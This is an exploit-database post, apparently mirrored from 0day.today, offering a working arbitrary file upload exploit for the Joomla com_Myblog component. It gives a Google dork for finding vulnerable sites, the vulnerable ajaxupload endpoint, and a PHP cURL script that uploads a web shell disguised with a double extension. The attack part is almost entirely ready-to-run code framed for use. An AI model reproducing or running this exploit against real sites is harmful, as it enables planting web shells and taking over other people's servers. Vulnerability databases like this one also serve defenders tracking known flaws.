Lucene search
K

Joomla com_Myblog Arbitrary File Upload Vulnerability

🗓️ 20 Jul 2015 00:00:00Reported by Back-DOORType 
zdt
 zdt
🔗 0day.today👁 313 Views

Joomla com_Myblog Arbitrary File Upload Vulnerability by Back-DOO

Code
[+]   Title : Joomla com_Myblog Exploit Arbitrary File Upload Vulnerability 


----------------------------------------------------

[+]   Author  : Back-DOOR

----------------------------------------------------
[+]   Exploit by   :   Back-DOOR

[+]   Dork google   :  inurl:/components/com_myblog/
----------------------------------------------------

[+]   Contact  :  https://facebook.com/Backdoor.ma
[+]   Like  :  https://fb.com/BaCkDoOr.HaCkInG
[+]   youtube chaine : https://www.youtube.com/user/BackDOOR8100/videos


exploit Vul : /index.php?option=com_myblog&task=ajaxupload


Vuln code : {error: 'No file has been uploaded.', msg: '' }


Exploiter :D :
***************************************************************************************************
<?php
$uploadfile="yourshell.php.xxxjpg";
$ch = curl_init("http://target/index.php?option=com_myblog&task=ajaxupload");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('fileToUpload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
***************************************************************************************************


#  0day.today [2018-01-04]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation